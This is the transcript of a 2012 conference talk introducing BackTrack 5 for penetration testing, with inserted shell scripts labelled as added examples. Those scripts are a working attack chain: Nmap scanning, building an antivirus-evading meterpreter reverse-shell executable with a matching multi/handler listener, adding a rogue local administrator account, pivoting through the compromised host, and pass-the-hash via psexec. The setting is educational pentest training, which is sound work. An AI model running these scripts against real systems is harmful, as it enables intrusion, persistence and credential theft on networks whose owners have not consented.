
An Introduction to BackTrack

Andrew Kozma, Atlantic Security Conference 2012, www.atlseccon.com

What is BackTrack?

Based on the Ubuntu GNU/Linux distribution
Designed for penetration testing and forensics
Large collection of security-related tools, ranging from port scanners to password crackers
LiveCD distribution, bootable from DVD or USB
Developed and maintained by the team at Offensive Security
Current version is BackTrack 5 R2 (kernel updated 02/24/12, ISO updated 03/01/12)
Free, and always will be!

Why do I need BackTrack?


Getting started with BackTrack


Where to get it
http://www.backtrack-linux.org/downloads/

Non persistent installation


Write the .iso to a DVD and boot from it
Recommended: Universal USB Installer to create a bootable thumb drive

BT5 Boot Menu


BT5 starts with networking enabled by default
Previous versions of BackTrack did not boot with networking enabled
If you need to be a ninja, select BackTrack Stealth from the boot menu (it boots with networking disabled)

Logging into BackTrack the first time


First use
When booting from the .iso you are automatically logged in as root
Default username is root, default password is toor
To launch the GUI, enter startx
Note: this is not a persistent install (yet)

Persistent Installation
This is optional
As easy as clicking the Install BackTrack icon on the desktop and following the prompts
Can be installed on the entire disk as the primary OS
Can be installed alongside another OS in a dual-boot configuration
Can be run as a virtual guest

Recommendations
Now that we have a persistent installation, change the default root password (passwd); everyone knows root/toor
Also take this opportunity to fix the WICD error
Type reboot in a terminal window

Launching the GUI

Log in with the root account and the new password
Enter startx to launch the GUI

Connecting to a WIFI Network


To connect to a wireless network, launch WICD from the menu: Internet > WICD
Select the WiFi network you wish to connect to and enter the appropriate security settings
The status bar at the bottom shows the network you are connected to and your IP address

Updating BackTrack with a script


Mad props to bl4ck5w4n for an awesome script!
Use wget to retrieve the tarball from the internet
Extract the tarball
Copy the script to the /bin directory
Make it executable
From a terminal, type bt5up and press enter
The script runs as root, so read it before you run it
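The five steps above as one script, added here as an example; it is not bl4ck5w4n's script and not from the slides. The download URL and the expected checksum are placeholders (the slide gives neither), and it installs to /usr/local/bin rather than /bin, the conventional place for locally added scripts. The point a practitioner cares about is the check before the copy: anything you drop into PATH on a root-only box should be verified first.

```shell
#!/bin/sh
# Added example, not the slide's script: fetch a tarball, verify it, extract
# the named script, install it executable, run it. URL and checksum below
# are assumptions.

# install_tarball_script TARBALL NAME DESTDIR [SHA256]
# Extracts NAME from TARBALL and installs it executable into DESTDIR.
# If SHA256 is given, refuses a tarball that does not match it.
install_tarball_script() {
    tarball=$1 name=$2 dest=$3 expect=${4:-}
    if [ -n "$expect" ]; then
        actual=$(sha256sum "$tarball" | cut -d' ' -f1)
        if [ "$actual" != "$expect" ]; then
            echo "checksum mismatch for $tarball: got $actual" >&2
            return 1
        fi
    fi
    tmp=$(mktemp -d) || return 1
    if ! tar -xzf "$tarball" -C "$tmp"; then
        rm -rf "$tmp"
        return 1
    fi
    # Find the script wherever the tarball's top-level directory put it.
    script=$(find "$tmp" -type f -name "$name" | head -n 1)
    if [ -z "$script" ]; then
        echo "$name not found in $tarball" >&2
        rm -rf "$tmp"
        return 1
    fi
    install -m 0755 "$script" "$dest/$name"   # copy + chmod +x in one step
    rc=$?
    rm -rf "$tmp"
    return $rc
}

# The slide's procedure end to end. URL and checksum are placeholders, not
# the real location of the bt5up tarball.
update_backtrack() {
    url="http://example.invalid/bt5up.tar.gz"                                    # assumed
    expected="0000000000000000000000000000000000000000000000000000000000000000"  # assumed
    wget -O /tmp/bt5up.tar.gz "$url" \
        && install_tarball_script /tmp/bt5up.tar.gz bt5up /usr/local/bin "$expected" \
        && bt5up
}
```

Without a published checksum the check degrades to "did the download complete", so at minimum read the extracted script before calling update_backtrack.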

I have Backtrack now what?


Yep, this is how I felt in the beginning
BackTrack can do some bad things. Be careful where you point that thing
Even though I know how to aim it, guess what? I am still a monkey (an extremely cool badass monkey with BackTrack though!)

Tools are arranged into 12 categories


Information Gathering
Vulnerability Assessment
Exploitation Tools
Privilege Escalation
Maintaining Access
Reverse Engineering
RFID Tools
Stress Testing
Forensics
Reporting Tools
Services
Miscellaneous

Tools
The number of tools available can be intimidating
The tools alone are not a means to an end
They are logically grouped by primary function
Tactics and strategy come from a pentest methodology, not from the menu

OSI Model (Attackers View)


Know what to use and when
Know how each tool impacts the stack and the network
Pick the right tool for the job
This is fundamental knowledge; to progress, a clear grasp of this model is highly recommended

Scanning
The more information we gather, the greater the chance of success
Identify live hosts
Identify the OS
Identify services (banner grab)
Check for vulnerabilities
Tool of choice: Nmap
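The scanning phases above as Nmap command lines, with a parser for Nmap's grepable (-oG) output so one phase's results feed the next. This is an added example, not from the slides; the target range is an assumed lab network and the sample output embedded below is constructed, not a real scan. Scan only systems you are authorised to test.

```shell
#!/bin/sh
# Added example: live hosts -> services/banners -> OS and vulnerability
# scripts, with grepable output parsed into "host port/proto service version".
# TARGET is an assumed lab range; sample_gnmap is constructed data.

TARGET="10.0.0.0/24"   # assumed lab range

# Phase 1: identify live hosts. -sn is a ping sweep with no port scan;
# "-oG -" writes grepable output to stdout, and awk keeps hosts marked Up.
discover_hosts() { nmap -sn -oG - "$1" | awk '/Status: Up/ { print $2 }'; }

# Phase 2: identify services and grab banners (-sV) on the hosts found.
scan_services() { nmap -sV -oG - "$@"; }

# Phase 3: OS detection (-O needs root) plus Nmap's "vuln" script category.
# Script findings go to the normal (.nmap) output, not the grepable file,
# so -oA keeps every format under one basename.
scan_os_vuln() { nmap -O -sV --script vuln -oA "scan_$1" "$@"; }

# Parse grepable output on stdin, one line per open port. In the Ports:
# field each entry is port/state/proto/owner/service/rpcinfo/version/ and
# entries are separated by ", ". Fields of the line itself are tab separated.
parse_gnmap() {
    awk -F '\t' '
        /^Host:/ {
            host = $1; sub(/^Host: /, "", host); sub(/ .*/, "", host)
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                ports = $i; sub(/^Ports: /, "", ports)
                n = split(ports, entry, ", ")
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    # f[1]=port f[2]=state f[3]=proto f[5]=service f[7]=version
                    if (f[2] == "open") print host, f[1] "/" f[3], f[5], f[7]
                }
            }
        }'
}

# Phases 1 and 2 chained: the live-host list becomes the service scan's targets.
scan_range() {
    hosts=$(discover_hosts "$1")
    [ -n "$hosts" ] || { echo "no live hosts in $1" >&2; return 1; }
    scan_services $hosts | parse_gnmap   # unquoted on purpose: one host per word
}

# Constructed sample of what scan_services writes (not a real scan); lets
# the parser be exercised offline: sample_gnmap | parse_gnmap
sample_gnmap() {
    printf 'Host: 10.0.0.5 ()\tStatus: Up\n'
    printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1 Debian 3ubuntu7/, 80/open/tcp//http//Apache httpd 2.2.14/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)\n'
    printf 'Host: 10.0.0.9 ()\tStatus: Up\n'
    printf 'Host: 10.0.0.9 ()\tPorts: 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/\tIgnored State: closed (999)\n'
}
```

Usage on the lab range is `scan_range "$TARGET"`, then `scan_os_vuln 10.0.0.9` for any host worth a closer look. The filtered 139/tcp entry in the sample is dropped by the parser on purpose: only open ports are worth carrying into the next phase.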

Vulnerabilities & Exploits


Vulnerability: a flaw or weakness in a system that can be exploited to cause a disruption in service and/or damage
Exploit: software that takes advantage of a vulnerability to escalate privileges or disrupt service
Overflow: an error condition that occurs when a program writes data beyond the bounds of the buffer it allocated
Payload: the code that runs on a system after it has been compromised

Metasploit
Free online course (Metasploit Unleashed) from the gang at Offensive Security (thanks guys, this is awesome!)
Does it all: it can scan, check for vulnerabilities, create your own payloads and deliver them
msfconsole is where most compromised hosts (sessions) are managed

Maintaining Access

If you can get a user to run a payload for you, there is no need to go through the trouble of exploiting any software (SET, the Social-Engineer Toolkit)
Payloads can be encoded to aid in bypassing AV software

Reverse Shell

Append O to the msfpayload command to display the available options for the selected payload

Reverse Shell

Compile the payload into an executable (the X option of msfpayload)

Reverse Shell

Now that the payload executable is ready to go, we use exploit/multi/handler to catch the connection from a payload launched outside the Metasploit framework

Reverse Shell

We need to tell multi/handler what payload to expect, so we configure it with the same settings (PAYLOAD, LHOST, LPORT) that we used to build the executable

Reverse Shell

Now that everything is prepared, we launch the attack with exploit
multi/handler catches the callback and we have a reverse shell session to the remote host
What access level does Jim have?
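The reverse-shell procedure from the last five slides as one script, added here as an example; it is not the slides' own commands and not Offensive Security's code. LHOST, LPORT and the output file name are assumptions. msfpayload and msfencode are the BackTrack 5 era tools; later Metasploit releases replaced both with msfvenom, but the flags below are the ones the slides use.

```shell
#!/bin/sh
# Added example: show payload options, build the executable, generate a
# multi/handler resource file from the same variables, start the listener.
# LHOST, LPORT and OUT are assumed values.

LHOST="192.168.1.10"                       # assumed: the BackTrack box's IP
LPORT="4444"                               # assumed listening port
PAYLOAD="windows/meterpreter/reverse_tcp"  # callback payload used throughout
OUT="payload.exe"                          # assumed output file name

# Step 1: the O flag lists the payload's options (LHOST, LPORT, ...).
show_payload_options() { msfpayload "$PAYLOAD" O; }

# Step 2: the X flag emits a Windows executable with the options baked in.
build_exe() { msfpayload "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" X > "$OUT"; }

# Step 2 (alternative): raw output through msfencode, as the Maintaining
# Access slide describes. Encoding changes the bytes, not the behaviour, so
# treat any AV bypass it gives as temporary.
build_encoded_exe() {
    msfpayload "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" R \
        | msfencode -e x86/shikata_ga_nai -c 5 -t exe > "$OUT"
}

# Steps 3 and 4: an msfconsole resource file configuring multi/handler with
# exactly the settings used to build the executable. Generating both from
# the same variables is what keeps them in sync; a mismatch in PAYLOAD or
# LPORT is the usual reason a callback never shows up.
handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$PAYLOAD"
    printf 'set LHOST %s\n' "$LHOST"
    printf 'set LPORT %s\n' "$LPORT"
    printf 'set ExitOnSession false\n'   # keep listening after the first session
    printf 'exploit -j\n'                # run the handler as a background job
}

# Step 5: start the listener. When Jim runs payload.exe a session appears;
# then "sessions -i 1" and "getuid" answer the slide's question about Jim's
# access level.
start_handler() {
    handler_rc > handler.rc
    msfconsole -r handler.rc
}
```

Run build_exe (or build_encoded_exe) first, then start_handler, then deliver the executable; the handler must be up before the payload runs or the connection is simply refused.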

Moving on
With a reverse shell connection we have the same privilege level as Jim (hope he is a local admin)
Let's create a local user with our own password, just for fun

The fun continues: we can now scan additional hosts and services from Jim's workstation
What level of access does Jim have on other workstations? (Pass the hash)
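The post-exploitation steps from the two slides above (privilege check, local user, scanning through Jim's workstation, pass the hash), added here as an example and not from the slides. The meterpreter commands are listed as comments because they are typed into the session, not into a BackTrack shell; the shell functions generate the msfconsole resource files for the pivot scan and the psexec pass-the-hash attempt. Host addresses, the user name and the hashdump line are constructed sample values.

```shell
#!/bin/sh
# Added example: meterpreter steps (as comments) plus resource-file
# generators for the pivot scan and pass the hash. All addresses, the
# account name and SAMPLE_HASH are assumed/constructed values.

# In the session (sessions -i 1), on Jim's workstation:
#   getuid                                   whose token do we hold?
#   getsystem                                escalate to SYSTEM (needs local admin)
#   shell
#   net user pentest P@ssw0rd1 /add          local user with our own password (assumed name)
#   net localgroup administrators pentest /add
#   exit
#   run autoroute -s 10.0.0.0/24             route framework traffic through this session
#   hashdump                                 needs SYSTEM; output feeds pth_rc below

# Scan other hosts through the pivot set up by autoroute.
# pivot_scan_rc SUBNET -> resource file on stdout
pivot_scan_rc() {
    printf 'use auxiliary/scanner/portscan/tcp\n'
    printf 'set RHOSTS %s\n' "$1"
    printf 'set PORTS 139,445,3389\n'   # SMB and RDP: where Jim's hash is reusable
    printf 'set THREADS 10\n'
    printf 'run\n'
}

# hashdump prints user:rid:LM:NTLM::: ; psexec takes SMBPass as LM:NTLM, so
# the hash itself is the credential and the password never needs cracking.
# pth_rc HASHDUMP_LINE RHOST LHOST LPORT -> resource file on stdout
pth_rc() {
    line=$1 rhost=$2 lhost=$3 lport=$4
    user=$(printf '%s' "$line" | cut -d: -f1)
    lm=$(printf '%s' "$line" | cut -d: -f3)
    nt=$(printf '%s' "$line" | cut -d: -f4)
    if [ ${#lm} -ne 32 ] || [ ${#nt} -ne 32 ]; then
        echo "malformed hashdump line: $line" >&2
        return 1
    fi
    printf 'use exploit/windows/smb/psexec\n'
    printf 'set RHOST %s\n' "$rhost"
    printf 'set SMBUser %s\n' "$user"
    printf 'set SMBPass %s:%s\n' "$lm" "$nt"
    printf 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    printf 'exploit\n'
}

# Constructed sample: the well-known hashes of an empty password, not a real
# credential. A real line from hashdump on Jim's box goes here instead.
SAMPLE_HASH='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'

# Usage (targets and ports are assumed):
#   pivot_scan_rc 10.0.0.0/24 > pivot.rc && msfconsole -r pivot.rc
#   pth_rc "$SAMPLE_HASH" 10.0.0.9 192.168.1.10 4445 > pth.rc && msfconsole -r pth.rc
```

If the same local Administrator hash opens the other workstations, that is the finding for the report: shared local admin credentials, not any single exploit, are what turned one workstation into the whole subnet.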

Documenting & Reporting


This is the work part, and it separates the good from the decent
You must be able to document your findings and present them to various levels of management
The report should include every step taken to perform the exploit and recommendations for remediation/mitigation
Pics or it didn't happen

Additional Resources
www.offensive-security.com
Metasploit Unleashed (free online course)
www.backtrack-linux.org
http://www.exploit-db.com/
http://www.exploit-db.com/google-dorks/
http://www.offensive-security.com/penetrationtesting-sample-report.pdf
www.thehask.com
Halifax Hack Lab (speak to Travis Barlow)

Conclusion
Have basic Unix command-line skills (try Kubuntu)
Take your time
Pick a few tools and learn them well
This is a continual process; you will always be learning
You have not failed until you stop trying

Many thanks to the team at Offensive Security for being the first educational sponsor of the Atlantic Security Conference

Questions?
